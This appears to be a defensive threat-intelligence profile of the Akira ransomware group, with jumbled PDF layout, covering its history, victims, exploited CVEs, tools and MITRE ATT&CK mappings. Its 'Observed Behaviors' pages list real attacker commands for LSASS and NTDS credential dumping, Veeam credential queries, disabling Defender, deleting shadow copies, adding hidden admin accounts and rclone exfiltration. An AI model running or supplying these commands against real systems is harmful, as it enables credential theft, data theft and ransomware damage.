THREAT PROFILE:

Akira
Ransomware
Table of Contents Executive Summary 2
Description 3
Previous Targets: Akira
Previous Industry Targets
Previous Victim HQ Regions
4
Data Leak Site: Akira 6
Known Exploited Vulnerabilities
7
Associations: Akira
8
Known Tools: Akira
10
Observed Akira Behaviors
Windows
Linux
15
MITRE ATT&CK® Mappings: Akira
19
References
25

THREAT PROFILE: AKIRA RANSOMWARE 1

Executive Summary
First Identified: Most frequently targeted industry:
2023 Industrials (Manufacturing)

Operation style: Most frequently targeted victim

Ransomware-as-a-Service (RaaS), affiliate HQ region:
payment structure is unknown; however, it is likely United States, North America
similar to other RaaS operations – 80/20 split.
Known Associations:
Extortion method: Exotic Lily
Double extortion – combining the traditional IQOJ Ransomware
ransomware extortion method (encryption) with Megazord Ransomware
exfiltration of victim’s sensitive data; the group ZHQ Ransomware
threatens to leak the data via a data leak site if the Conti Ransomware
ransom demand is not paid. Karakurt Hacking Team
xanonymoux

INITIAL ACCESS PERSISTENCE LATERAL MOVEMENT

Unauthorized logon to Creating new accounts, Abuse of remote services,

VPNs, exploiting external browser extensions, server tainted shared content,
remote services, exploiting software components, boot lateral tool transferring
known vulnerabilities, social or logon autostart execution (MITRE ATT&CK: T1021,
engineering, IABs (MITRE (MITRE ATT&CK: T1136, T1080, T1563, T1570)
ATT&CK: T1078, T1133, T1176, T1505, T1547)
T1190, T1199, T1566)

THREAT PROFILE: AKIRA RANSOMWARE 2

Description
Akira ransomware was first observed in March The group has been
2023 and operates in the double extortion
method, where victims’ data is stolen and leaked
observed demanding ransom
if the ransom is not paid. Akira has been linked payments between 200,000
to the former Conti operation through TTPs,
behaviors, blockchain analysis where Akira USD and 4 million USD.
ransom payments were sent to Conti affiliated
wallets. In June 2023, Avast researchers In August 2023, a new variant of the Akira
released a decryptor for the Akira ransomware; ransomware, Megazord, was observed being
however, the threat actors then modified their deployed. This variant was written in Rust and
encryptor indicating that the available decryptor appends encrypted data with “.powerranges”,
no longer works. The group has been observed whereas the previous version was written in
demanding ransom payments between 200,000 Microsoft Visual C/C++ and appended encrypted
USD and 4 million USD. data with “.akira.” Additionally, two other
variants of Akira were identified in 2023, IQOJ
Akira operators gain initial access by using and ZHQ variants. The ransom notes observed
unauthorized logon to VPNs by targeting with these variants led victims to the Akira TOR
accounts that did not have multi-factor site.
authentication (MFA) enabled, specifically
targeting Cisco VPN products, and purchasing Additionally, Akira maintains a Linux version of
credentials or access from initial access brokers the malware that uses various symmetric key
(IABs). Additionally, the operators have been algorithms for file encryption, including AES,
observed targeted known vulnerabilities in CAMELLIA, DES, and IDEA. The Linux version
Cisco, Fortinet, and Veeam products. excludes the same file extensions and directories
from file encryption as the Windows version; the
Akira’s name is widely believed to be from a ransom notes are the same. This indicates that the
1988 anime movie with the same name. threat actor ported the Windows version to Linux.
Additionally, the aesthetic is emulated by the
operators on their data leak site. The In November 2023, prior victims of the Akira
ransomware developers likely based their name ransomware variant were contacted by a threat
on the powerful entity within the anime movies, actor identifying themselves as “xanonymoux”
or from its related manga. who claimed to have gained access to a server
hosting victim data exfiltrated by Akira. The
The group’s data leak site does not host actual threat actor then attempted to extort the victim
stolen data like other ransomware operations. for additional money in exchange for accessing
The group utilizes links that require Torrenting the server and/or deleting the data from the Akira
software to download and view the stolen data. server. Additionally, xanonymoux claimed the
This tactic has previously been observed by the Akira group was associated with the Karakurt
Clop ransomware operation when they listed Hacking Team; however, evidence of the
victims targeted via the MOVEit vulnerability connection remains unknown.
in 2023.
A ransomware variant was identified in 2017 with
the same name; however, analysis revealed that
the current-day Akira is very likely a different
operation.
THREAT PROFILE: AKIRA RANSOMWARE 3
Previous Akira Targets
Previous Industry Targets from 01 Jul 2023 to 30 Jun 2024

Construction &
Engineering: 22
Industrials 95 Manufacturing: 44
Transportation: 13
Other: 16
Hotels & Entertainment: 10
Consumer Cyclicals 36 Retail: 13
Other: 13
MSPs: 1
Technology 26 Telecommunications: 10
Other: 15
Business Services: 8
Professional & Commercial Services 23 Legal Services: 11
Other: 4

Academics 14

Consumer Non-Cyclicals 9

Energy 6

Real Estate 6

Institutions & Organizations 6

Healthcare 6

Insurance: 2
Financials 4 Other: 2

Basic Materials 2

Utilities 1

Government 1

0 20 40 60 80 100

# of Incidents

THREAT PROFILE: AKIRA RANSOMWARE 4

Previous Targets: Akira
Previous Victim HQ Regions from 01 Jul 2023 to 30 Jun 2024

North America 163

Europe 47

South America 12
84

Oceania 8

Asia 4

Africa 1

0 50 100 150 200

# of Incidents

THREAT PROFILE: AKIRA RANSOMWARE 5

Data Leak Site: Akira

hxxps://akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad[.]onion/
hxxps://akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id[.]onion/

THREAT PROFILE: AKIRA RANSOMWARE 6

Known Exploited
Vulnerabilities
CVE-2019-6693 (CVSS: 7.5)
Hardcoded Cryptographic Key Vulnerability
Product Affected: Fortinet FortiOS

CVE-2020-3259 (CVSS: 7.5)

Information Disclosure Vulnerability
Product Affected: Cisco ASA and FTD

CVE-2022-40684 (CVSS: 9.8)

Authentication Bypass Vulnerability
Product Affected: Fortinet FortiOS

CVE-2023-20269 (CVSS: 9.1)

Unauthorized Access Vulnerability
Product Affected: Cisco Adaptive Security Appliance Software and Firepower Threat Defense
Software Remote Access VPN

CVE-2023-27532 (CVSS: 7.5)

Missing Authentication for Critical Function Vulnerability
Product Affected: Veeam Backup & Replication Cloud Connect

CVE-2023-48788 (CVSS: 9.8)

SQL Injection Vulnerability
Product Affected: Fortinet FortiClient EMS

CVE-2024-37085 (CVSS: 6.8)

Authentication Bypass Vulnerability
Product Affected: VMware ESXi

THREAT PROFILE: AKIRA RANSOMWARE 7

Associations: Akira
Punk Spider
Akira alias used by CrowdStrike.

Gold Sahara
Akira alias used by SecureWorks.

IQOJ Ransomware
A new variant of the Akira ransomware observed in 2023.

Megazord Ransomware
A new variant of the Akira ransomware observed in August 2023.

ZHQ Ransomware
A new variant of the Akira ransomware observed in 2023.

Exotic Lily
A financially motivated threat group that has been known to act as an initial access broker for other
malicious actors, including Akira ransomware operators.

xanonymoux
In November 2023, security researchers reported that prior victims of Akira ransomware were
contacted by an entity identifying themselves as “xanonymoux.” The entity claimed to have
obtained access to a server hosting the victim’s data exfiltrated by Akira. The entity then attempted
to extort the victim for additional funds to provide access to the purported server or delete the
data. The connection between Akira and xanonymoux remains unknown; however, other operations
have been observed using additional extortion methods similar to this tactic.

Conti Ransomware
Security researchers have reported that the Akira ransomware variant bears resemblance to the
Conti ransomware builder that was leaked in 2022. Akira ignores the same file types and
directories as Contri and has similar functions. Additionally, Akira ransomware transactions overlap
with Conti threat actors on multiple occasions. In, at least, three separate transactions, Akira sent
the full amount of their ransom payments to Conti affiliated addresses.

THREAT PROFILE: AKIRA RANSOMWARE 8

Associations: Akira
Karakurt Hacking Team
The entity, xanonymoux, claimed to prior victims of Akira ransomware that Akira was associated
with the Karakurt Hacking Team. However, the entity did not elaborate on the connection and no
additional connection has been identified.

THREAT PROFILE: AKIRA RANSOMWARE 9

Known Tools: Akira
A tool that is used to compress files into an archive. Used by threat
7zip
actors to compress data before exfiltration.

A free command-line query tool that can be used for gathering

AdFind
information from Active Directory.

A fast and powerful network scanner with a user-friendly interface.

Advanced IP
It can locate all computers on your wired or wireless local network and
Scanner scan their ports.

A remote desktop application that provides remote access to

AnyDesk
computers and other devices.

BypassCredGuard A utility used to bypass Windows Credential Guard.

A tool that provides users with a secure way to connect resources

without a publicly routable IP address. It creates a secure, outbound-
Cloudflare Tunnel
only connection between your services and Cloudflare by deploying a
lightweight connector in your environment.

cmd A program used to execute commands on a Windows computer.

decrypt.py A script used for decrypting password data from Fortinet devices.

A tool that can locate and retrieve Windows Data Protection API
DonPAPI
(DPAPI) protected credentials, aka DPAPI dumping.

A free open-source file transfer protocol software tool that allows

FileZilla users to set up FTP servers or connect to other FTP servers to
exchange files.

Script used for remotely extracting the configuration of Fortinet

fortiConfParser.py
devices.

An open-source collection of modules written in Python for

Impacket
programmatically constructing and manipulating network protocols.

THREAT PROFILE: AKIRA RANSOMWARE 10

Known Tools: Akira
KillAV A tool used to terminate antivirus related services and processes.

An IT discovery & inventory platform that delivers insights into the status
LANSweeper
of users, devices, and software within IT environments.

An open-source application used to retrieve passwords stored on

LaZagne
a local computer.

A simple and lightweight tool for establishing SOCKS5 or TCP tunnels

Ligolo
from a reverse connection in complete safety.

LSASS A Windows process that takes care of security policy for the OS.

A port scanner that can detect whether ports are open, complete the TCP
MASSCAN connection and interaction with the application at that port to grab simple
banner information.

MEGA A cloud storage and file hosting service.

An open-source application that allows users to view and save

Mimikatz
authentication credentials, including Kerberos tickets.

A C# implementation of Mimikatz/pypykatz minidump functionality to get

Minidump
credentials from LSASS dumps.

An application that provides X-Server capability for the Microsoft

MobaXterm Windows OS. It allows applications running in the Unix/Linux environment
to display graphical user interfaces on the MS Windows desktop.

A Windows utility that is used in command-line operations for control of

users, groups, services, and network connections. It can gather system and
Net
network information, move laterally through SMB/Windows Admin
Shares, and interact with services.

A legitimate utility developed by NirSoft that recovers all network

NetPass
passwords stored on a system for the current logged-on user.

THREAT PROFILE: AKIRA RANSOMWARE 11

Known Tools: Akira
A tool that exposes local servers behind NATs and firewalls to the public
ngrok
internet over secure tunnels.

A Windows command-line utility used to list domain controllers and

Nltest
enumerate domain trusts.

Non-Sucking A service manager that manages background and foreground services

Service Manager and processes.

A command-line tool that provides management facilities for Active

NTDSUtil Directory Domain Services (AD DS) and Active Directory Lightweight
Directory Services (AD LDS).

A toolkit for Windows with various powerful features for kernel structure
PC Hunter
viewing and manipulating.

A task automation and configuration management program that includes

PowerShell
a command-line shell and the associated scripting language.

A security tool that scans and analyzes files at kernel level; can help
PowerTool
threat actors remove and disable security services/software.

A utility tool that allows users to control a computer from a remote

PsExec
location.

A free and open-source terminal emulator, serial console, and network

PuTTY
file transfer application.

A remote access software that allows users to work on a remote

computer in real time. Users can remotely access the same computer
Radmin
from multiple places and use advanced File Transfer function, multi-user
Text and Voice chats, Remote Shutdown, and Telnet.

A command line program for syncing files with cloud storage services
Rclone
such as Dropbox, Google Drive, Amazon S3, and MEGA.

THREAT PROFILE: AKIRA RANSOMWARE 12

Known Tools: Akira
A protocol that provides a user with a graphical interface to
RDP
connect to another computer over a network connection.

A tool designed to perform automated recon on a target domain

by running the best set of tools to perform scanning and finding
reconftw
vulnerabilities. It automates the entire process of
reconnaissance for the user.

An open-source remote desktop client for POSIX-based

Remmina operating systems that allows users to connect to remote
systems.

A remote access and remote control software, allowing threat

RustDesk actors to access victim machines remotely. The client is
available for different operating systems.

AKA ConnectWise. A remote management software used to

ScreenConnect
gain access to a remote computer.

The official data collector for BloodHound; it is written in C# and

uses native Windows API functions and LSAP namespace
SharpHound
functions to collect data from domain controllers and domain-
joined Windows systems.

A client-server communication protocol used for sharing access

SMB
to files, printers, serial ports, and other resources on a network.

A network scanner that can ping computers, scan ports,

SoftPerfect discover shared folders and retrieve practically any information
about network devices.

AKA Coroxy. A malware written in C that turns infected

SystemBC
computers into SOCKS5 proxies.

A utility that displays a list of applications and services with

Tasklist their Process IDs for all tasks running on either a local or a
remote computer.

A tool reportedly capable of bypassing 24 different AV, EDR,

Terminator.exe
and XDR security solutions, including Windows Defender.

THREAT PROFILE: AKIRA RANSOMWARE 13

Known Tools: Akira
ToolPow A tool that can be used to bypass security solutions.

VeeamHax.exe A plaintext credential leaking tool.

A tool that enables users to connect to and manage virtual machines

VmConnect.exe
running on Hyper-V hosts.

WebBrowserPas A password recovery tool that reveals the passwords stored by web
sView browsers.

Microsoft's core set of application programming interfaces available in

the Microsoft Windows OS. It creates and uses windows to display
WinAPI
output, prompt for user input, and carry out the other tasks that support
interaction with the user.

A library for reducing required reboots during software updates. The

Windows Restart
tool is often used by threat actors to support the encryption process and
Manager retrieve processes running on the system.

A trialware file archiver utility for Windows devices that can backup data
and reduce the size of email attachments, open and unpack RAR, ZIP
WinRAR
and other files downloaded from Internet, and create new archives in
RAR and ZIP file format.

A free and open-source SFTP, FTP, WebDAV, S3, and SCP client for
WinSCP
Windows that can be used to exfiltrate files to a remote server.

A tool that allows threat actors to execute commands on a remote

WMIExec
systems and/or establish a semi-interactive shell on a remote host.

THREAT PROFILE: AKIRA RANSOMWARE 14

Observed Akira
Behaviors: Windows
"C:\Users\<user>\Downloads\AnyDesk.exe" --install "C:\Program Files
(x86)\AnyDesk" --start-with-win --create-shortcuts --create-
taskbar-icon --create-desktop-icon --install-driver:mirror --install-
Command and driver:printer --update-main --svc-conf "C:\Users\
Control <user>\AppData\Roaming\AnyDesk\service.conf" --sys-conf
"C:\Users\<user>\AppData\Roaming\AnyDesk\system.conf"
"C:\Users\<user>\Downloads\dwagent.exe"
"cmd.exe" /c C:\ProgramData\Microsoft\crome.exe

cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump

572 C:\ProgramData\lsass.dmp full
"cmd.exe" /c C:\ProgramData\Cl.exe -c -i C:\Windows\NTDS\ntds.dit -
o C:\programdata\nt.txt
"cmd.exe" /c C:\ProgramData\Cl.exe -c -i
c:\Windows\System32\config\SYSTEM -o C:\programdata\sys
ntdsutil "ac i ntds" "ifm" "create full
c:\Programdata\temp\Crashpad\Temp\abc" q q
sqlcmd.exe -S localhost,60261 -E -y0 -Q "SELECT TOP (1000) [id],
[user_name],[password],[usn],[description],[visible],
[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
esentutl.exe /y "C:\Users\
<user>\AppData\Local\Google\Chrome\User Data\Default\Login
Credential Access Data" /d "C:\Users\<user>\AppData\Local\Google\Chrome\User
Data\Default\Login Data.tmp"
C:\Windows\system32\NOTEPAD.EXE \\
<Redacted>\it\KeePass\Department Cloud Accounts - Backup
Codes\-backup-codes.txt
C:\Users\testrdp\Downloads\Mimik\Pass\BypassCredGuard.exe
C:\Users\testrdp\Downloads\Mimik\Pass\WebBrowserPassView.exe
C:\Users\testrdp\Downloads\Mimik\Pass\netpass64.exe
C:\Users\testrdp\Downloads\Mimik.exe
cmd.exe /Q /c esentutl.exe /y
"C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\
<firefox_profile_id>.default-release\key4.db" /d
"C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\
<firefox_profile_id>.default-release\key4.db.tmp”

THREAT PROFILE: AKIRA RANSOMWARE 15

Observed Akira
Behaviors: Windows
New Value">HKLM\SOFTWARE\Microsoft\Windows
Defender\Exclusions\Paths\C:\
runas/netonly /user:<username>\<username> cmd
Defense Evasion
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy |
Remove-WmiObject"
Set-MpPreference -DisableRealtimeMonitoring $true

"C:\Windows\system32\cmd.exe" /c net localgroup Administrators

"C:\Windows\system32\net.exe" localgroup administrators
Get-ADComputer -Filter * -Property * | Select-Object Enabled,
Name, DNSHostName, IPv4Address, OperatingSystem, Description,
CanonicalName, servicePrincipalName, LastLogonDate,
whenChanged, whenCreated > C:\ProgramData\AdComp[.]txt
Discovery FindFirstFileW()
FindNextFileW()
GetLogicalDriveStrings()
C:\Users\<user>\Desktop\netscan_n.exe
C:\users\<user>\appdata\local\temp\3\advanced ip scanner
2\advanced_ip_scanner.exe
C:\Users\<user>\Desktop\Advanced_IP_Scanner_2.5.4594.1.exe

"C:\Users\<user>\Downloads\winrar-x64-623.exe"
rclone copy \\192.168.XXX.214\f$ st:"/home/.../.../F" --max-age 1y --
Exfiltration
exclude "*. [excluded files] -q --ignore-existing --auto-confirm --
multi-thread-streams 25 --transfers 25 –P

C:\w[.]exe
C:\Users\install\Downloads\w[.]exe
\\192.168.XXX.37\c$\w[.]exe
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy |
Impact
Remove-WmiObject"
start 1.exe -p="\\<redacted> \C$" -n=10
start 1.exe -p="\\ <redacted> \ <redacted>$" -n=10
start 1.exe -p="\\ <redacted> \D$" -n=10

THREAT PROFILE: AKIRA RANSOMWARE 16

Observed Akira
Behaviors: Windows
C:\Windows\system32\net1user <username> <RedactedPassword>
/ADD
C:\Windows\system32\net1localgroup Administrators <username>
/ADD
"C:\Windows\system32\reg.exe" add
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v
<username> /t REG_DWORD /d 0 /f
rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-
Persistence
Process lsass).Id) C:\windows\temp\lsass.dmp full
net group "ESX Admins" /domain /add
net group "ESX Admins" <username> /domain /add
net user admin P@ssw0rd! /add
net localgroup "administrators" admin /add
net group “Domain admins” /dom
net localgroup “Administrators” /dom
nltest /DOMAIN_TRUSTS
nltest /dclist:

THREAT PROFILE: AKIRA RANSOMWARE 17

Observed Akira
Behaviors: Linux
Encrypts Local Device Only -localonly or ly

CryptAcquireContextW()
CryptImportPublicKeyInfo()
Encryption
CryptGenRandom()
CryptEncrypt()

File that Contains Paths and

--share_file or -s
Devices to Encrypt

Specifies Path Where Files

--encryption_path or -p
will be Recursively Encrypted

Type of Encryption to Apply --encryption_percent or -n

THREAT PROFILE: AKIRA RANSOMWARE 18

MITRE ATT&CK Mappings:
®

Akira
Reconnaissance

T1595: Active Scanning .002: Vulnerability Scanning

Resource Development

T1584: Compromise Infrastructure

T1588: Obtain Capabilities .002: Tool

Initial Access

T1078: Valid Accounts

T1133: External Remote Services

T1190: Exploit Public-Facing Application

T1195: Supply Chain Compromise

T1199: Trusted Relationship

.001: Spearphishing Attachment

T1566: Phishing
.002: Spearphishing Link

Execution

T1047: Windows Management Instrumentation

.001: PowerShell
T1059: Command and Scripting Interpreter .002: AppleScript
.003: Windows Command Shell

THREAT PROFILE: AKIRA RANSOMWARE 19

MITRE ATT&CK Mappings:
®

Akira
Execution

T1106: Native API

T1129: Shared Modules

T1204: User Execution .001: Malicious File

Persistence

.001: Local Account

T1136: Create Account
.002: Domain Account

T1176: Browser Extensions

T1505: Server Software Component .003: Web Shell

.001: Registry Run Keys / Startup Folder

T1547: Boot or Logon Autostart Execution
.009: Shortcut Modification

Privilege Escalation

T1098: Account Manipulation

.001: Registry Run Keys / Startup Folder

T1547: Boot or Logon Autostart Execution
.009: Shortcut Modification

Defense Evasion

T1006: Direct Volume Access

.001: Binary Padding

T1027: Obfuscated Files or Information
.005: Indicator Removal from Tools

THREAT PROFILE: AKIRA RANSOMWARE 20

MITRE ATT&CK Mappings:
®

Akira
Defense Evasion

T1036: Masquerading .005: Match Legitimate Name or Location

T1112: Modify Registry

T1222: File and Directory Permissions .001: Windows File and Directory Permissions
Modification Modification

T1497: Virtualization/Sandbox Evasion

T1550: Use Alternative Authentication Material .002: Pass the Hash

T1562: Impair Defenses .001: Disable or Modify Tools

T1622: Debugger Evasion

Credential Access

T1003: OS Credential Dumping .001: LSASS Memory

T1555: Credentials from Password Stores .003: Credentials from Web Browsers

.001: LLMNR/NBT-NS Poisoning and SMB

T1557: Adversary-in-the-Middle
Relay

Discovery

T1010: Application Window Discovery

T1012: Query Registry

THREAT PROFILE: AKIRA RANSOMWARE 21

MITRE ATT&CK Mappings:
®

Akira
Discovery

T1016: System Network Configuration Discovery

T1018: Remote System Discovery

T1046: Network Service Discovery

T1057: Process Discovery

.001: Local Groups

T1069: Permission Groups Discovery
.002: Domain Groups

T1082: System Information Discovery

T1083: File and Directory Discovery

T1087: Account Discovery .001: Local Account Discovery

T1135: Network Share Discovery

T1482: Domain Trust Discovery

T1518: Software Discovery .001: Security Software Discovery

T1614: System Location Discovery

Lateral Movement

.001: Remote Desktop Protocol

T1021: Remote Services .002: SMB/Windows Admin Shares
.004: SSH

THREAT PROFILE: AKIRA RANSOMWARE 22

MITRE ATT&CK Mappings:
®

Akira
Lateral Movement

T1080: Taint Shared Content

T1563: Remote Service Session Hijacking .002: RDP Hijacking

T1570: Lateral Tool Transfer

Collection

T1005: Data from Local System

T1114: Email Collection .001: Local Email Collection

T1185: Browser Session Hijacking

T1560: Archive Collected Data .001: Archive via Utility

Command and Control

T1090: Proxy

T1105: Ingress Tool Transfer

T1219: Remote Access Software

Exfiltration

T1020: Automated Exfiltration

T1029: Scheduled Transfer

THREAT PROFILE: AKIRA RANSOMWARE 23

MITRE ATT&CK Mappings:
®

Akira
Exfiltration

T1041: Exfiltration Over C2 Channel

.003: Exfiltration Over Unencrypted Non-C2

T1048: Exfiltration Over Alternative Protocol
Protocol

T1537: Transfer Data to Cloud Account

T1567: Exfiltration Over Web Service .002: Exfiltration to Cloud Storage

Impact

T1486: Data Encrypted for Impact

T1489: Service Stop

T1490: Inhibit System Recovery

T1531: Account Access Removal

T1657: Financial Theft

THREAT PROFILE: AKIRA RANSOMWARE 24

References
BushidoToken (2023, September 15) “Tracking Adversaries: Akira, another descendent of Conti.”
https://blog.bushidotoken.net/2023/09/tracking-adversaries-akira-another.html
Campbell, Steven; Suthar, Akshay; Belfiore, Connor (2023, July 26) Arctic Wolf: “Conti and Akira:
Chained Together.” https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/
CISA (2024, April 18) “#StopRansomware: Akira Ransomware.” https://www.cisa.gov/news-
events/cybersecurity-advisories/aa24-109a
CloudSEK (2023, July 24) “Akira Ransomware: What You Need to Know.”
https://www.cloudsek.com/threatintelligence/akira-ransomware-what-you-need-to-know
Cutler, Silas (2023, August 23) Stairwell: “Akira: Pulling on the chains of ransomware.”
https://stairwell.com/resources/akira-pulling-on-the-chains-of-ransomware/
Cyble (2023, May 10) “Unraveling Akira Ransomware.” https://cyble.com/blog/unraveling-akira-
ransomware/
Demboski, Morgan (2023, December 21) Sophos: “Akira, again: The ransomware that keeps on
taking.” https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-
taking/
Dharmavaram, Rakesh; Yeleswarapu, Praveen (2023, July 28) BluSapphire: “An In-depth Analysis
of Akira Ransomware Attacks.” https://www.blusapphire.com/blog/an-in-depth-analysis-of-akira-
ransomware-attacks
Hostetler, Stefan; Campbell, Steven (2024, January 04) Arctic Wolf: “Follow-On Extortion
Campaign Targeting Victims of Akira and Royal Ransomware.”
https://arcticwolf.com/resources/blog/follow-on-extortion-campaign-targeting-victims-of-akira-
and-royal-ransomware/
Imano, Shunichi; Slaughter, James (2023, October 12) Fortinet: “Ransomware Roundup – Akira.”
https://www.fortinet.com/blog/threat-research/ransomware-roundup-akira
Kadja, Manoel (2023, September 13) Darktrace: “Akira Ransomware: How Darktrace Foiled
Another Novel Ransomware Attack.” https://darktrace.com/blog/akira-ransomware-how-
darktrace-foiled-another-novel-ransomware-attack
Khan, Mohammad Amr (2023, June 21) Pulsedive: “Akira Ransomware.”
https://blog.pulsedive.com/akira-ransomware/
Montini, Heloise (2023, December 28) Proven Data: “Akira Ransomware: What You Need To
Know.” https://www.provendata.com/blog/akira-ransomware/
Moshayev, Emanuel (2023, October 18) Cynet: “Megazord Ransomware.”
https://www.cynet.com/blog/megazord-ransomware-technical-analysis-and-preventions/
Mundo, Alexandre; Kersten, Max (2023, November 29) Trellix: “Akira Ransomware.”
https://www.trellix.com/about/newsroom/stories/research/akira-ransomware/
Pondurance (2023, November 22) “Akira Ransomware, Threat Intelligence, and more.”
https://www.pondurance.com/blog/akira-ransomware-and-threat-intelligence/
Poudel, Swachchhanda Shrawan (2023, September) Logpoint: “Deciphering Akira’s Arsenal:
Tactics for Uncovering and Responding.” https://www.logpoint.com/wp-
content/uploads/2023/09/emerging-threats-akira.pdf

THREAT PROFILE: AKIRA RANSOMWARE 25

References
Sequrtek (n.d.) “Akira Ransomware Analysis.” https://sequretek.com/akira-ransomware-analysis/
The BlackBerry Research & Intelligence Team (2024, July 11) “Akira Ransomware Targets the
LATAM Airline Industry.” https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-
latam-airline-industry
Trend Micro Research (2023, October 05) “Ransomware Spotlight: Akira.”
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-
spotlight-akira

THREAT PROFILE: AKIRA RANSOMWARE 26

Adversary Pursuit Group